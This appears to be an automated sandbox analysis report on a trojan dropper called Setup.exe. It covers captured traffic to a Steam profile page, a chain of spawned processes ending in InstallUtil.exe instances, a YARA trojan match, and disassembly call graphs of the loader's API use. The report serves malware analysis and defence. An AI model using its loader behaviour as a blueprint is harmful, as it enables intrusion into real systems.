                                                                                                                                                                                                                              2024-11-17 23:15:57 UTC16384INData Raw: 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0d 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22
                                                                                                                                                                                                                              Data Ascii: </a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript"
                                                                                                                                                                                                                              2024-11-17 23:15:57 UTC3768INData Raw: 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0d 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22 3e 26 6e
                                                                                                                                                                                                                              Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name">&n
                                                                                                                                                                                                                              2024-11-17 23:15:57 UTC12053INData Raw: 65 6e 74 6f 72 79 2f 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 5f 6c 69 6e 6b 5f 6c 61 62 65 6c 22 3e 49 6e 76 65 6e 74 6f 72 79 3c 2f 73 70 61 6e 3e 26 6e 62 73 70 3b 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 75 6e 74 5f 6c 69 6e 6b 5f 74 6f 74 61 6c 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 26 6e 62 73 70 3b 20 3c 21 2d 2d 20 73 6f 20 74 68 65 20 6c 69 6e 65 20 73 70 61 63 65 73 20 6c 69 6b 65 20 74 68 65 20 72 65 73 74 20 2d 2d 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                              Data Ascii: entory/"><span class="count_link_label">Inventory</span>&nbsp;<span class="profile_count_link_total">&nbsp; ... so the line spaces like the rest --></span></a></div>


                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:18:15:12
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                                                                              Imagebase:0x8d0000
                                                                                                                                                                                                                              File size:8'060'800 bytes
                                                                                                                                                                                                                              MD5 hash:0BF89E05C575D4BCDCDADB17C7517C29
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                              Start time:18:15:13
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                              Imagebase:0x380000
                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:18:15:13
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:18:15:18
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              Imagebase:0x230000
                                                                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:18:15:49
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\7LUEA3.pif
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx"
                                                                                                                                                                                                                              Imagebase:0x840000
                                                                                                                                                                                                                              File size:943'784 bytes
                                                                                                                                                                                                                              MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:18:15:55
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              Imagebase:0xd0000
                                                                                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:18:15:55
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              Imagebase:0x860000
                                                                                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                              Start time:18:15:55
                                                                                                                                                                                                                              Start date:17/11/2024
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:34.7%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:5.4%
                                                                                                                                                                                                                                Total number of Nodes:149
                                                                                                                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                                                                                                                execution_graph 1235 8eee3a 1238 8ee1da 1235->1238 1239 8ee243 1238->1239 1297 8ed18a 1239->1297 1241 8ee278 1242 8ed18a GetPEB 1241->1242 1243 8ee28f 1242->1243 1244 8ee2ac GlobalAlloc 1243->1244 1245 8ee2e4 1244->1245 1300 8eda5a 1245->1300 1247 8ee507 1303 8eccaa 1247->1303 1249 8ee524 1306 8ecfca 1249->1306 1251 8ee541 1252 8eda5a GlobalAlloc 1251->1252 1253 8ee649 1252->1253 1310 8ecc3a 1253->1310 1255 8ee666 1256 8ecfca 2 API calls 1255->1256 1257 8ee679 1256->1257 1313 8edaba 1257->1313 1259 8ee6f1 1320 8ecd2a 1259->1320 1261 8ee7cd 1323 8ed39a CreateFileW 1261->1323 1263 8ee7ef 1329 8edcba 1263->1329 1265 8ee82f 1266 8ee93d 1265->1266 1267 8ee8e9 1265->1267 1269 8ee975 1266->1269 1270 8ee945 1266->1270 1333 8ede6a 1267->1333 1271 8eda5a GlobalAlloc 1269->1271 1339 8ece3a 1270->1339 1275 8ee982 1271->1275 1272 8ee935 1276 8eec05 1272->1276 1278 8eec54 1272->1278 1362 8ec62a 1272->1362 1277 8eda5a GlobalAlloc 1275->1277 1279 8eea00 1277->1279 1278->1276 1280 8eda5a GlobalAlloc 1278->1280 1343 8ecd7a 1279->1343 1282 8eed01 1280->1282 1284 8ecfca 2 API calls 1282->1284 1283 8eea52 1286 8eda5a GlobalAlloc 1283->1286 1289 8eeb6a 1283->1289 1285 8eed38 1284->1285 1288 8eda5a GlobalAlloc 1285->1288 1295 8eeaad 1286->1295 1290 8eed75 1288->1290 1289->1272 1358 8ec42a 1289->1358 1291 8eed92 VirtualProtect 1290->1291 1337 8ed34a 1291->1337 1295->1289 1348 8ec77a 1295->1348 1351 8edf9a 1295->1351 1365 8ee18a GetPEB 1297->1365 1299 8ed1aa 1299->1241 1301 8eda6a 1300->1301 1302 8eda76 GlobalAlloc 1300->1302 1301->1302 1302->1247 1304 8eda5a GlobalAlloc 1303->1304 1305 8eccb9 1304->1305 1305->1249 1307 8eda5a GlobalAlloc 1306->1307 1308 8ecfdb 1307->1308 1309 8ecfee LoadLibraryW 1308->1309 1309->1251 1311 8eda5a GlobalAlloc 1310->1311 1312 8ecc49 1311->1312 1312->1255 1315 8edacf 1313->1315 1314 8eda5a GlobalAlloc 1314->1315 1315->1314 1316 8edb07 NtQuerySystemInformation 1315->1316 1319 8edaf5 1315->1319 1316->1315 1317 8edb33 1316->1317 1318 8eda5a GlobalAlloc 1317->1318 1318->1319 1319->1259 1321 8eda5a GlobalAlloc 1320->1321 1322 8ecd38 1321->1322 1322->1261 1324 8ed3ce 1323->1324 1325 8ed3c7 1323->1325 1324->1325 1326 8eda5a GlobalAlloc 1324->1326 1325->1263 1327 8ed40a ReadFile 1326->1327 1327->1325 1328 8ed445 CloseHandle 1327->1328 1328->1325 1330 8edccb 1329->1330 1331 8ecfca 2 API calls 1330->1331 1332 8edda0 1331->1332 1332->1265 1334 8ede8d 1333->1334 1335 8edf22 1334->1335 1336 8edf9a 4 API calls 1334->1336 1335->1272 1336->1334 1338 8ed356 VirtualProtect 1337->1338 1338->1276 1340 8ece5d 1339->1340 1341 8eceab 1340->1341 1342 8ec42a GlobalAlloc 1340->1342 1341->1272 1342->1340 1344 8eda5a GlobalAlloc 1343->1344 1345 8ecd8b 1344->1345 1346 8eda5a GlobalAlloc 1345->1346 1347 8ecdad 1346->1347 1347->1283 1366 8ec9ca 1348->1366 1350 8ec7bf 1350->1295 1352 8ecd7a GlobalAlloc 1351->1352 1353 8edfa9 1352->1353 1372 8ed98a CreateFileW 1353->1372 1357 8edfce 1357->1295 1359 8ec454 1358->1359 1360 8ec45b 1358->1360 1359->1272 1360->1359 1361 8eda5a GlobalAlloc 1360->1361 1361->1360 1363 8eda5a GlobalAlloc 1362->1363 1364 8ec63d 1363->1364 1364->1278 1365->1299 1367 8ec9d9 1366->1367 1368 8eda5a GlobalAlloc 1367->1368 1371 8ec9e5 1367->1371 1369 8ecad0 1368->1369 1370 8eda5a GlobalAlloc 1369->1370 1370->1371 1371->1350 1373 8ed9bb WriteFile 1372->1373 1374 8ed9b7 1372->1374 1373->1374 1374->1357 1375 8eefea 1374->1375 1376 8eeffb 1375->1376 1377 8ef08e malloc 1376->1377 1378 8ef03a 1376->1378 1377->1378 1378->1357 1383 8eceea 1388 8ec73a 1383->1388 1385 8ecf02 1386 8ed39a 4 API calls 1385->1386 1387 8ecf2a 1386->1387 1389 8eda5a GlobalAlloc 1388->1389 1390 8ec748 1389->1390 1390->1385 1379 8ec416 1380 8ec454 1379->1380 1382 8ec45b 1379->1382 1381 8eda5a GlobalAlloc 1381->1382 1382->1380 1382->1381 1391 8eeb70 1398 8eeac0 1391->1398 1392 8eeb6a 1394 8eebfb 1392->1394 1395 8ec42a GlobalAlloc 1392->1395 1393 8ec77a GlobalAlloc 1393->1398 1396 8ec62a GlobalAlloc 1394->1396 1397 8eec05 1394->1397 1399 8eec54 1394->1399 1395->1394 1396->1399 1398->1392 1398->1393 1400 8edf9a 4 API calls 1398->1400 1399->1397 1401 8eda5a GlobalAlloc 1399->1401 1400->1398 1402 8eed01 1401->1402 1403 8ecfca 2 API calls 1402->1403 1404 8eed38 1403->1404 1405 8eda5a GlobalAlloc 1404->1405 1406 8eed75 1405->1406 1407 8eed92 VirtualProtect 1406->1407 1408 8ed34a 1407->1408 1409 8eedcf VirtualProtect 1408->1409 1409->1397

                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                callgraph 0 Function_008ED98A 1 Function_008EE18A 2 Function_008ED18A 2->1 91 Function_008ED23A 2->91 3 Function_008ED88A 42 Function_008ED5EA 3->42 65 Function_008ED31A 3->65 4 Function_008EF786 5 Function_008F2584 46 Function_008F24FC 5->46 6 Function_008EF582 7 Function_008F249C 73 Function_008EC410 7->73 8 Function_008ED49A 41 Function_008ED8EA 8->41 44 Function_008ED2EA 8->44 9 Function_008EDA9A 10 Function_008ED39A 101 Function_008EDA5A 10->101 11 Function_008EDF9A 11->0 11->9 40 Function_008EEFEA 11->40 118 Function_008ECD7A 11->118 12 Function_008EC69A 13 Function_008EF29A 13->44 119 Function_008EF27A 13->119 14 Function_008ED59A 14->65 15 Function_008ED29A 75 Function_008ED62A 15->75 16 Function_008EE095 17 Function_008EF790 18 Function_008EE1AA 19 Function_008EF6AA 20 Function_008ECCAA 98 Function_008ED54A 20->98 99 Function_008ED34A 20->99 20->101 110 Function_008ED46A 20->110 21 Function_008F14AA 22 Function_008EDCBA 30 Function_008ECFCA 22->30 32 Function_008ED4CA 22->32 96 Function_008ED04A 22->96 23 Function_008EDABA 23->3 23->32 57 Function_008ED10A 23->57 23->101 24 Function_008EE0BA 67 Function_008EEF1A 24->67 25 Function_008EEEBA 26 Function_008F28B8 27 Function_008F0DB8 28 Function_008F2AB5 29 Function_008F25CC 29->46 30->14 30->101 31 Function_008EC9CA 31->65 31->99 31->101 33 Function_008EE1CA 34 Function_008EC3C9 35 Function_008F0CC4 36 Function_008EE1DA 36->2 36->10 36->11 36->18 36->20 36->22 36->23 36->30 36->44 36->57 58 Function_008ED00A 36->58 70 Function_008ED81A 36->70 76 Function_008ECD2A 36->76 78 Function_008EDC2A 36->78 79 Function_008EC42A 36->79 80 Function_008EC62A 36->80 88 Function_008ECF3A 36->88 89 Function_008ED93A 36->89 92 Function_008ECE3A 36->92 93 Function_008ECC3A 36->93 95 Function_008ECB3A 36->95 36->96 97 Function_008ECB4A 36->97 36->98 36->99 36->101 105 Function_008ECB5A 36->105 108 Function_008EDE6A 36->108 117 Function_008EC77A 36->117 36->118 37 Function_008EF7D9 38 Function_008F0AD8 39 Function_008EF5D7 40->24 40->32 102 Function_008EEE5A 40->102 41->44 43 Function_008ECEEA 43->10 94 Function_008EC73A 43->94 104 Function_008ED65A 43->104 45 Function_008EF7FE 47 Function_008F24FA 48 Function_008F25F6 48->46 49 Function_008EFDF2 50 Function_008F28F2 51 Function_008F28F0 52 Function_008F0A0C 53 Function_008EDA0A 53->65 54 Function_008ED50A 55 Function_008EE00A 56 Function_008EF30A 57->65 57->119 59 Function_008EC70A 59->32 60 Function_008EF809 61 Function_008EF602 62 Function_008EF700 63 Function_008F2400 64 Function_008EF71C 66 Function_008ECD1A 67->25 68 Function_008EF51A 68->32 68->99 116 Function_008EF37A 68->116 69 Function_008ED71A 70->32 71 Function_008EC416 71->12 71->55 71->56 71->99 71->101 72 Function_008F0D14 74 Function_008ECE2A 76->89 76->101 77 Function_008EF22A 77->77 78->77 79->12 79->55 79->56 79->99 79->101 80->68 80->101 81 Function_008ECB2A 82 Function_008EC928 83 Function_008F0B28 84 Function_008EDC20 85 Function_008F2620 85->46 86 Function_008EF83D 87 Function_008F253C 87->46 88->13 90 Function_008EEE3A 90->36 91->42 92->55 92->79 92->99 93->98 93->99 93->101 93->110 94->69 94->101 96->13 96->18 98->44 100 Function_008F0A48 103 Function_008ED85A 103->14 103->65 105->65 106 Function_008F0C58 107 Function_008EF752 108->11 108->32 108->55 108->99 121 Function_008EDC7A 108->121 109 Function_008ED76A 110->44 110->54 111 Function_008F1664 112 Function_008F2664 113 Function_008F0D60 114 Function_008EF77E 115 Function_008F267C 117->31 117->98 118->59 118->101 118->104 120 Function_008ED17A 122 Function_008EEF7A 123 Function_008F2672 124 Function_008EEB70 124->11 124->18 124->30 124->44 124->58 124->70 124->79 124->80 124->88 124->89 124->97 124->98 124->99 124->101 124->105 124->117

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 008EDABA Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 216 8edaba-8edac8 217 8edacf-8edad6 216->217 218 8edadc-8edaf3 call 8eda5a 217->218 219 8edc21-8edc25 217->219 222 8edafa-8edb27 call 8ed4ca NtQuerySystemInformation 218->222 223 8edaf5 218->223 226 8edb29-8edb31 222->226 227 8edb33-8edb50 call 8eda5a 222->227 223->219 226->217 230 8edb53-8edb59 227->230 231 8edb5f-8edb66 230->231 232 8edc1a 230->232 233 8edb6c-8edb8c call 8ed4ca 231->233 234 8edc0a-8edc15 231->234 232->219 237 8edb97-8edb9d 233->237 234->230 238 8edb9f-8edbab 237->238 239 8edbc3-8edbef call 8ed88a call 8ed10a 237->239 238->239 240 8edbad-8edbc1 238->240 246 8edbf9-8edc02 239->246 247 8edbf1-8edbf7 239->247 240->237 246->234 248 8edc04-8edc07 246->248 247->234 248->234
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 008EDA5A: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 008EDB1E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobalInformationQuerySystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3737350999-0
                                                                                                                                                                                                                                • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                                                                                                                                                • Instruction ID: 9712cbb6ae0ee0c4deb69e51cb5d91d66728a6a7e7bb7db9430c2a020baf57e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A5107B5E00249EFCB04DF99C880AAEB7B5FF49304F208559E915E7344D770AE45CBA1
                                                                                                                                                                                                                                Function 008EE1DA Relevance: 5.5, APIs: 3, Instructions: 995memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 8ee1da-8ee6fa call 8edc2a call 8ed18a * 2 call 8ed04a GlobalAlloc call 8ed04a * 17 call 8eda5a call 8eccaa call 8ecfca call 8ed04a * 8 call 8eda5a call 8ecc3a call 8ecfca call 8ed04a * 3 call 8edaba 79 8ee6fc-8ee703 0->79 80 8ee72a-8ee870 call 8ed04a * 3 call 8ecd2a call 8ed39a call 8ed04a call 8edcba 0->80 81 8ee70e-8ee712 79->81 101 8ee878-8ee883 80->101 102 8ee872-8ee876 80->102 81->80 82 8ee714-8ee728 call 8ed81a 81->82 82->81 103 8ee889-8ee8e7 101->103 104 8ee885 101->104 102->103 105 8ee93d-8ee943 103->105 106 8ee8e9-8ee930 call 8ede6a 103->106 104->103 108 8ee975-8ee9b0 call 8eda5a call 8ed34a 105->108 109 8ee945-8ee970 call 8ece3a 105->109 111 8ee935-8ee938 106->111 122 8ee9ba-8ee9c0 108->122 114 8eec0a-8eec1e 109->114 111->114 117 8eec65-8eec71 114->117 118 8eec20-8eec5c call 8ec62a 114->118 121 8eec74-8eec97 call 8ed2ea 117->121 127 8eec5e 118->127 128 8eec63 118->128 132 8eeca8-8eee24 call 8ecf3a call 8eda5a call 8ed54a call 8ed93a call 8ecfca call 8ee1aa call 8eda5a call 8ed34a VirtualProtect call 8ed34a VirtualProtect 121->132 133 8eec99-8eeca2 121->133 125 8ee9ef-8eea06 call 8eda5a 122->125 126 8ee9c2-8ee9ed 122->126 137 8eea0d-8eea18 125->137 126->122 131 8eee2e-8eee31 127->131 128->121 185 8eee2b 132->185 133->132 139 8eea1a-8eea37 137->139 140 8eea39-8eea9c call 8ecd7a call 8ed10a call 8ecb3a 137->140 139->137 153 8eebda-8eebe0 140->153 154 8eeaa2-8eeab6 call 8eda5a 140->154 153->114 158 8eebe2-8eec03 call 8ec42a 153->158 163 8eeac0-8eeac7 154->163 158->114 165 8eec05 158->165 166 8eeacd-8eeaf4 call 8ecb5a 163->166 167 8eebb4-8eebd7 call 8ecb4a 163->167 165->131 175 8eeb16-8eeb3b call 8ec77a 166->175 176 8eeaf6-8eeb14 call 8ed81a 166->176 167->153 183 8eeb3f-8eeb4a 175->183 184 8eeb3d 175->184 176->163 186 8eebaf 183->186 187 8eeb4c-8eeb68 call 8ed00a 183->187 184->163 185->131 186->163 190 8eeb6a-8eeb6e 187->190 191 8eeb72-8eebab call 8edf9a 187->191 190->167 191->186 194 8eebad 191->194 194->167
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(?,00000A46), ref: 008EE2BE
                                                                                                                                                                                                                                  • Part of subcall function 008EDA5A: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                  • Part of subcall function 008ECFCA: LoadLibraryW.KERNELBASE(?), ref: 008ECFFB
                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 008EEDAF
                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 008EEDE2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobalProtectVirtual$LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1966084984-0
                                                                                                                                                                                                                                • Opcode ID: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                                                                                                                                                • Instruction ID: b5fd6df51284a6fb5d6726954a45516e7c3cfd29841d7d6a88e0c93adb111e80
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C92D7B5E00218AFCB54DF99C881EEEB7B6BF8D300F148698E509A7345E631AE45CF51
                                                                                                                                                                                                                                Function 008ED39A Relevance: 4.6, APIs: 3, Instructions: 79fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
